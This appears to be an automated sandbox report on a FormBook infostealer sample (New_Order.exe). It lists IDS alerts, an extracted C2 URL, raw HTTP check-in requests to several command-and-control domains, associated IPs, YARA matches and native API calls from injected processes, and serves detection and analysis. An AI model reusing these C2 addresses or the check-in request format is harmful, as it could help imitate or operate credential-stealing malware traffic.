Source: Traffic	Snort IDS: 2031449 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.5:49725 -> 8.210.40.49:80
Source: Traffic	Snort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.5:49725 -> 8.210.40.49:80
Source: Traffic	Snort IDS: 2031453 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.5:49727 -> 34.102.136.180:80
Source: Traffic	Snort IDS: 2031449 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.5:49727 -> 34.102.136.180:80
Source: Traffic	Snort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.5:49727 -> 34.102.136.180:80

C2 URLs / IPs found in malware configuration

Source: Malware configuration extractor

URLs: www.voiceclubdubai.com/icsm/

Performs DNS queries to domains with low reputation

Source: C:\Windows\explorer.exe

DNS query: www.year-action.xyz

HTTP GET or POST without a user agent

Source: global traffic	HTTP traffic detected: GET /icsm/?zZSlDz=zaS0K7Z6s3udRIV54ona/Y7FMvuM79U9hGlb72LKWqTP1QF33lUaB5+awkVfTrm4Szdf&b6jPH=FBZdWxvpgT HTTP/1.1Host: www.roastedorganic.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /icsm/?b6jPH=FBZdWxvpgT&zZSlDz=S3hZ9hucZB3EtOR58Q5nEiimGsTcBclBSgHOETXnBYv0klj7oHI8wHmFL3huZKvOqIBH HTTP/1.1Host: www.voiceclubdubai.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /icsm/?b6jPH=FBZdWxvpgT&zZSlDz=7Y2cvYyrvfqxgunt3pZhUV8c5sAKyRnRxEqYxYZ4IV2yKeALIaVm9IYD5cxomw6uu8uh HTTP/1.1Host: www.geacasolaro.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /icsm/?zZSlDz=abv0Zjoypqon102KK4Aabri2R1obo2mniMfeUFfIxPUpBgCKzPX+m7Nu7myx3UJKSvBt&b6jPH=FBZdWxvpgT HTTP/1.1Host: www.charmboutiques.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /icsm/?b6jPH=FBZdWxvpgT&zZSlDz=bWXej36VQHpcttmtRFRFltU4ahfDKjPxw8enIUkEUFX2dD9DLv700yN2zBLMaSA3vN4R HTTP/1.1Host: www.websitemax.co.ukConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /icsm/?zZSlDz=logo8bpUoQPWTQLlZghyT7WZQjxZBYpYOJDMMbKRF5+Nw+24xZrLdIoslO6i49yZrWE6&b6jPH=FBZdWxvpgT HTTP/1.1Host: www.year-action.xyzConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /icsm/?b6jPH=FBZdWxvpgT&zZSlDz=TR2dy7NfXkcYQth3vstvigvFAK3lzNu6618cspSNEjM/3bTBgf6HWtuv8wkgUujUQhHp HTTP/1.1Host: www.hdjakdhf.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /icsm/?zZSlDz=LFJNa/qc3hvrLE0QUTB49n97WnaBmuBdNse4fNn2XI4P2ly5LcfV2yqmdABiPtDvfVQd&b6jPH=FBZdWxvpgT HTTP/1.1Host: www.susanestuart.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:

IP address seen in connection with other malware

Source: Joe Sandbox View	IP Address: 75.2.115.196 75.2.115.196
Source: Joe Sandbox View	IP Address: 23.227.38.74 23.227.38.74

Internet Provider seen in connection with other malware

Source: Joe Sandbox View	ASN Name: AMAZON-02US AMAZON-02US
Source: Joe Sandbox View	ASN Name: ARUBA-ASNIT ARUBA-ASNIT
Source: Joe Sandbox View	ASN Name: TELEPOINTBG TELEPOINTBG

Source: global traffic	HTTP traffic detected: GET /icsm/?zZSlDz=zaS0K7Z6s3udRIV54ona/Y7FMvuM79U9hGlb72LKWqTP1QF33lUaB5+awkVfTrm4Szdf&b6jPH=FBZdWxvpgT HTTP/1.1Host: www.roastedorganic.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /icsm/?b6jPH=FBZdWxvpgT&zZSlDz=S3hZ9hucZB3EtOR58Q5nEiimGsTcBclBSgHOETXnBYv0klj7oHI8wHmFL3huZKvOqIBH HTTP/1.1Host: www.voiceclubdubai.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /icsm/?b6jPH=FBZdWxvpgT&zZSlDz=7Y2cvYyrvfqxgunt3pZhUV8c5sAKyRnRxEqYxYZ4IV2yKeALIaVm9IYD5cxomw6uu8uh HTTP/1.1Host: www.geacasolaro.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /icsm/?zZSlDz=abv0Zjoypqon102KK4Aabri2R1obo2mniMfeUFfIxPUpBgCKzPX+m7Nu7myx3UJKSvBt&b6jPH=FBZdWxvpgT HTTP/1.1Host: www.charmboutiques.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /icsm/?b6jPH=FBZdWxvpgT&zZSlDz=bWXej36VQHpcttmtRFRFltU4ahfDKjPxw8enIUkEUFX2dD9DLv700yN2zBLMaSA3vN4R HTTP/1.1Host: www.websitemax.co.ukConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /icsm/?zZSlDz=logo8bpUoQPWTQLlZghyT7WZQjxZBYpYOJDMMbKRF5+Nw+24xZrLdIoslO6i49yZrWE6&b6jPH=FBZdWxvpgT HTTP/1.1Host: www.year-action.xyzConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /icsm/?b6jPH=FBZdWxvpgT&zZSlDz=TR2dy7NfXkcYQth3vstvigvFAK3lzNu6618cspSNEjM/3bTBgf6HWtuv8wkgUujUQhHp HTTP/1.1Host: www.hdjakdhf.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /icsm/?zZSlDz=LFJNa/qc3hvrLE0QUTB49n97WnaBmuBdNse4fNn2XI4P2ly5LcfV2yqmdABiPtDvfVQd&b6jPH=FBZdWxvpgT HTTP/1.1Host: www.susanestuart.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:

Source: unknown

DNS traffic detected: queries for: www.roastedorganic.com

Source: global traffic

Source: explorer.exe, 00000002.00000000.262522191.000000000BC36000.00000002.00000001.sdmp	String found in binary or memory: http://fontfabrik.com
Source: New_Order.exe	String found in binary or memory: http://nsis.sf.net/NSIS_Error
Source: New_Order.exe	String found in binary or memory: http://nsis.sf.net/NSIS_ErrorError
Source: explorer.exe, 00000002.00000000.262522191.000000000BC36000.00000002.00000001.sdmp	String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0
Source: explorer.exe, 00000002.00000000.262522191.000000000BC36000.00000002.00000001.sdmp	String found in binary or memory: http://www.carterandcone.coml
Source: explorer.exe, 00000002.00000000.262522191.000000000BC36000.00000002.00000001.sdmp	String found in binary or memory: http://www.fontbureau.com
Source: explorer.exe, 00000002.00000000.262522191.000000000BC36000.00000002.00000001.sdmp	String found in binary or memory: http://www.fontbureau.com/designers
Source: explorer.exe, 00000002.00000000.262522191.000000000BC36000.00000002.00000001.sdmp	String found in binary or memory: http://www.fontbureau.com/designers/?
Source: explorer.exe, 00000002.00000000.262522191.000000000BC36000.00000002.00000001.sdmp	String found in binary or memory: http://www.fontbureau.com/designers/cabarga.htmlN
Source: explorer.exe, 00000002.00000000.262522191.000000000BC36000.00000002.00000001.sdmp	String found in binary or memory: http://www.fontbureau.com/designers/frere-jones.html
Source: explorer.exe, 00000002.00000000.262522191.000000000BC36000.00000002.00000001.sdmp	String found in binary or memory: http://www.fontbureau.com/designers8
Source: explorer.exe, 00000002.00000000.262522191.000000000BC36000.00000002.00000001.sdmp	String found in binary or memory: http://www.fontbureau.com/designers?
Source: explorer.exe, 00000002.00000000.262522191.000000000BC36000.00000002.00000001.sdmp	String found in binary or memory: http://www.fontbureau.com/designersG
Source: explorer.exe, 00000002.00000000.262522191.000000000BC36000.00000002.00000001.sdmp	String found in binary or memory: http://www.fonts.com
Source: explorer.exe, 00000002.00000000.262522191.000000000BC36000.00000002.00000001.sdmp	String found in binary or memory: http://www.founder.com.cn/cn
Source: explorer.exe, 00000002.00000000.262522191.000000000BC36000.00000002.00000001.sdmp	String found in binary or memory: http://www.founder.com.cn/cn/bThe
Source: explorer.exe, 00000002.00000000.262522191.000000000BC36000.00000002.00000001.sdmp	String found in binary or memory: http://www.founder.com.cn/cn/cThe
Source: explorer.exe, 00000002.00000000.262522191.000000000BC36000.00000002.00000001.sdmp	String found in binary or memory: http://www.galapagosdesign.com/DPlease
Source: explorer.exe, 00000002.00000000.262522191.000000000BC36000.00000002.00000001.sdmp	String found in binary or memory: http://www.galapagosdesign.com/staff/dennis.htm
Source: explorer.exe, 00000002.00000000.262522191.000000000BC36000.00000002.00000001.sdmp	String found in binary or memory: http://www.goodfont.co.kr
Source: explorer.exe, 00000002.00000000.262522191.000000000BC36000.00000002.00000001.sdmp	String found in binary or memory: http://www.jiyu-kobo.co.jp/
Source: explorer.exe, 00000002.00000000.262522191.000000000BC36000.00000002.00000001.sdmp	String found in binary or memory: http://www.sajatypeworks.com
Source: explorer.exe, 00000002.00000000.262522191.000000000BC36000.00000002.00000001.sdmp	String found in binary or memory: http://www.sakkal.com
Source: explorer.exe, 00000002.00000000.262522191.000000000BC36000.00000002.00000001.sdmp	String found in binary or memory: http://www.sandoll.co.kr
Source: explorer.exe, 00000002.00000000.262522191.000000000BC36000.00000002.00000001.sdmp	String found in binary or memory: http://www.tiro.com
Source: explorer.exe, 00000002.00000000.262522191.000000000BC36000.00000002.00000001.sdmp	String found in binary or memory: http://www.typography.netD
Source: explorer.exe, 00000002.00000000.262522191.000000000BC36000.00000002.00000001.sdmp	String found in binary or memory: http://www.urwpp.deDPlease
Source: explorer.exe, 00000002.00000000.262522191.000000000BC36000.00000002.00000001.sdmp	String found in binary or memory: http://www.zhongyicts.com.cn
Source: wscript.exe, 00000007.00000002.498023186.0000000004EF2000.00000004.00000001.sdmp	String found in binary or memory: https://www.lcn.com/parked-domains/index?/=/domain/websitemax.co.uk

Key, Mouse, Clipboard, Microphone and Screen Capturing:

Contains functionality for read data from the clipboard

Source: C:\Users\user\Desktop\New_Order.exe

0_2_0040535C

E-Banking Fraud:

Yara detected FormBook

Source: Yara match	File source: 00000000.00000002.240328103.00000000024E0000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000007.00000002.494703247.0000000000610000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000002.277382659.0000000002DD0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000002.277759385.00000000035D0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000007.00000002.495776656.0000000001120000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000007.00000002.495702077.00000000010F0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000002.277108812.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 1.2.svchost.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.New_Order.exe.24e0000.4.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.New_Order.exe.24e0000.4.unpack, type: UNPACKEDPE
Source: Yara match	File source: 1.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPE

System Summary:

Malicious sample detected (through community Yara rule)

Source: 00000000.00000002.240328103.00000000024E0000.00000004.00000001.sdmp, type: MEMORY	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000000.00000002.240328103.00000000024E0000.00000004.00000001.sdmp, type: MEMORY	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000007.00000002.494703247.0000000000610000.00000040.00000001.sdmp, type: MEMORY	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000007.00000002.494703247.0000000000610000.00000040.00000001.sdmp, type: MEMORY	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000001.00000002.277382659.0000000002DD0000.00000040.00000001.sdmp, type: MEMORY	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000001.00000002.277382659.0000000002DD0000.00000040.00000001.sdmp, type: MEMORY	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000001.00000002.277759385.00000000035D0000.00000040.00000001.sdmp, type: MEMORY	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000001.00000002.277759385.00000000035D0000.00000040.00000001.sdmp, type: MEMORY	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000007.00000002.495776656.0000000001120000.00000004.00000001.sdmp, type: MEMORY	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000007.00000002.495776656.0000000001120000.00000004.00000001.sdmp, type: MEMORY	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000007.00000002.495702077.00000000010F0000.00000040.00000001.sdmp, type: MEMORY	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000007.00000002.495702077.00000000010F0000.00000040.00000001.sdmp, type: MEMORY	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000001.00000002.277108812.0000000000400000.00000040.00000001.sdmp, type: MEMORY	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000001.00000002.277108812.0000000000400000.00000040.00000001.sdmp, type: MEMORY	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 1.2.svchost.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 1.2.svchost.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 0.2.New_Order.exe.24e0000.4.raw.unpack, type: UNPACKEDPE	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 0.2.New_Order.exe.24e0000.4.raw.unpack, type: UNPACKEDPE	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 0.2.New_Order.exe.24e0000.4.unpack, type: UNPACKEDPE	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 0.2.New_Order.exe.24e0000.4.unpack, type: UNPACKEDPE	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 1.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 1.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group

Initial sample is a PE file and has a suspicious name

Source: initial sample

Static PE information: Filename: New_Order.exe

Contains functionality to call native functions

Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_004181C0 NtCreateFile,	1_2_004181C0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_00418270 NtReadFile,	1_2_00418270
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_004182F0 NtClose,	1_2_004182F0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_004183A0 NtAllocateVirtualMemory,	1_2_004183A0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_004181BA NtCreateFile,	1_2_004181BA
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_004182EA NtClose,	1_2_004182EA
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0041839B NtAllocateVirtualMemory,	1_2_0041839B
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03969A00 NtProtectVirtualMemory,LdrInitializeThunk,	1_2_03969A00
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03969A20 NtResumeThread,LdrInitializeThunk,	1_2_03969A20
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03969A50 NtCreateFile,LdrInitializeThunk,	1_2_03969A50
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_039699A0 NtCreateSection,LdrInitializeThunk,	1_2_039699A0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03969910 NtAdjustPrivilegesToken,LdrInitializeThunk,	1_2_03969910
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_039698F0 NtReadVirtualMemory,LdrInitializeThunk,	1_2_039698F0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03969840 NtDelayExecution,LdrInitializeThunk,	1_2_03969840
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03969860 NtQuerySystemInformation,LdrInitializeThunk,	1_2_03969860
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03969780 NtMapViewOfSection,LdrInitializeThunk,	1_2_03969780
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_039697A0 NtUnmapViewOfSection,LdrInitializeThunk,	1_2_039697A0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03969FE0 NtCreateMutant,LdrInitializeThunk,	1_2_03969FE0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03969710 NtQueryInformationToken,LdrInitializeThunk,	1_2_03969710
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_039696E0 NtFreeVirtualMemory,LdrInitializeThunk,	1_2_039696E0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03969660 NtAllocateVirtualMemory,LdrInitializeThunk,	1_2_03969660
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_039695D0 NtClose,LdrInitializeThunk,	1_2_039695D0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03969540 NtReadFile,LdrInitializeThunk,	1_2_03969540
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0396A3B0 NtGetContextThread,	1_2_0396A3B0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03969B00 NtSetValueKey,	1_2_03969B00
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03969A80 NtOpenDirectoryObject,	1_2_03969A80
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03969A10 NtQuerySection,	1_2_03969A10
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_039699D0 NtCreateProcessEx,	1_2_039699D0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03969950 NtQueueApcThread,	1_2_03969950
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_039698A0 NtWriteVirtualMemory,	1_2_039698A0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03969820 NtEnumerateKey,	1_2_03969820
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0396B040 NtSuspendThread,	1_2_0396B040
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0396A710 NtOpenProcessToken,	1_2_0396A710
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03969730 NtQueryVirtualMemory,	1_2_03969730
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03969770 NtSetInformationFile,	1_2_03969770
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0396A770 NtOpenThread,	1_2_0396A770
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03969760 NtOpenProcess,	1_2_03969760
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_039696D0 NtCreateKey,	1_2_039696D0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03969610 NtEnumerateValueKey,	1_2_03969610
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03969650 NtQueryValueKey,	1_2_03969650
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03969670 NtQueryInformationProcess,	1_2_03969670
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_039695F0 NtQueryInformationFile,	1_2_039695F0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0396AD30 NtSetContextThread,	1_2_0396AD30
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03969520 NtWaitForSingleObject,	1_2_03969520
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03969560 NtWriteFile,	1_2_03969560
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 7_2_048A9840 NtDelayExecution,LdrInitializeThunk,	7_2_048A9840
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 7_2_048A9860 NtQuerySystemInformation,LdrInitializeThunk,	7_2_048A9860
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 7_2_048A99A0 NtCreateSection,LdrInitializeThunk,	7_2_048A99A0
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 7_2_048A95D0 NtClose,LdrInitializeThunk,	7_2_048A95D0
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 7_2_048A9910 NtAdjustPrivilegesToken,LdrInitializeThunk,	7_2_048A9910
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 7_2_048A9540 NtReadFile,LdrInitializeThunk,	7_2_048A9540
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 7_2_048A96D0 NtCreateKey,LdrInitializeThunk,	7_2_048A96D0
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 7_2_048A96E0 NtFreeVirtualMemory,LdrInitializeThunk,	7_2_048A96E0
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 7_2_048A9650 NtQueryValueKey,LdrInitializeThunk,	7_2_048A9650
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 7_2_048A9A50 NtCreateFile,LdrInitializeThunk,	7_2_048A9A50
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 7_2_048A9660 NtAllocateVirtualMemory,LdrInitializeThunk,	7_2_048A9660
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 7_2_048A9780 NtMapViewOfSection,LdrInitializeThunk,	7_2_048A9780
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 7_2_048A9FE0 NtCreateMutant,LdrInitializeThunk,	7_2_048A9FE0
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 7_2_048A9710 NtQueryInformationToken,LdrInitializeThunk,	7_2_048A9710
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 7_2_048A98A0 NtWriteVirtualMemory,	7_2_048A98A0
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 7_2_048A98F0 NtReadVirtualMemory,	7_2_048A98F0
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 7_2_048A9820 NtEnumerateKey,	7_2_048A9820
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 7_2_048AB040 NtSuspendThread,	7_2_048AB040
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 7_2_048A99D0 NtCreateProcessEx,	7_2_048A99D0
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 7_2_048A95F0 NtQueryInformationFile,	7_2_048A95F0
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 7_2_048A9520 NtWaitForSingleObject,	7_2_048A9520
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 7_2_048AAD30 NtSetContextThread,	7_2_048AAD30
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 7_2_048A9950 NtQueueApcThread,	7_2_048A9950
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 7_2_048A9560 NtWriteFile,	7_2_048A9560
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 7_2_048A9A80 NtOpenDirectoryObject,	7_2_048A9A80
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 7_2_048A9A00 NtProtectVirtualMemory,	7_2_048A9A00
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 7_2_048A9610 NtEnumerateValueKey,	7_2_048A9610
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 7_2_048A9A10 NtQuerySection,	7_2_048A9A10
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 7_2_048A9A20 NtResumeThread,	7_2_048A9A20
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 7_2_048A9670 NtQueryInformationProcess,	7_2_048A9670
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 7_2_048A97A0 NtUnmapViewOfSection,	7_2_048A97A0
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 7_2_048AA3B0 NtGetContextThread,	7_2_048AA3B0
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 7_2_048A9B00 NtSetValueKey,	7_2_048A9B00
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 7_2_048AA710 NtOpenProcessToken,	7_2_048AA710
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 7_2_048A9730 NtQueryVirtualMemory,	7_2_048A9730
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 7_2_048A9760 NtOpenProcess,	7_2_048A9760
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 7_2_048A9770 NtSetInformationFile,	7_2_048A9770
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 7_2_048AA770 NtOpenThread,	7_2_048AA770
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 7_2_006281C0 NtCreateFile,	7_2_006281C0
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 7_2_00628270 NtReadFile,	7_2_00628270
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 7_2_006282F0 NtClose,	7_2_006282F0
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 7_2_006283A0 NtAllocateVirtualMemory,	7_2_006283A0
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 7_2_006281BA NtCreateFile,	7_2_006281BA
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 7_2_006282EA NtClose,	7_2_006282EA
Source: C:\Windows\SysWOW64\wscript.exe	Code function: 7_2_0062839B NtAllocateVirtualMemory,	7_2_0062839B

Contains functionality to shutdown / reboot the system

Source: C:\Users\user\Desktop\New_Order.exe

0_2_00403348

Detected potential crypto function

Source: C:\Users\user\Desktop\New_Order.exe	Code function: 0_2_00406945	0_2_00406945
Source: C:\Users\user\Desktop\New_Order.exe	Code function: 0_2_0040711C	0_2_0040711C
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_00401030	1_2_00401030
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0041BA5D	1_2_0041BA5D
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0041C34C	1_2_0041C34C
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_00408C60	1_2_00408C60
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0041B4A3	1_2_0041B4A3
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_00402D90	1_2_00402D90
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_00402FB0	1_2_00402FB0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0395EBB0	1_2_0395EBB0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_039E03DA	1_2_039E03DA
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_039EDBD2	1_2_039EDBD2
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_039F2B28	1_2_039F2B28
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0394AB40	1_2_0394AB40
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_039F22AE	1_2_039F22AE
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_039DFA2B	1_2_039DFA2B
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0392F900	1_2_0392F900
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03944120	1_2_03944120
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_0393B090	1_2_0393B090
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_039520A0	1_2_039520A0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_039F20A8	1_2_039F20A8
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_039F28EC	1_2_039F28EC
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_039E1002	1_2_039E1002
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_039FE824	1_2_039FE824
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_039FDFCE	1_2_039FDFCE
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_039F1FF1	1_2_039F1FF1
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_039F2EF7	1_2_039F2EF7
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_039ED616	1_2_039ED616
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03946E30	1_2_03946E30
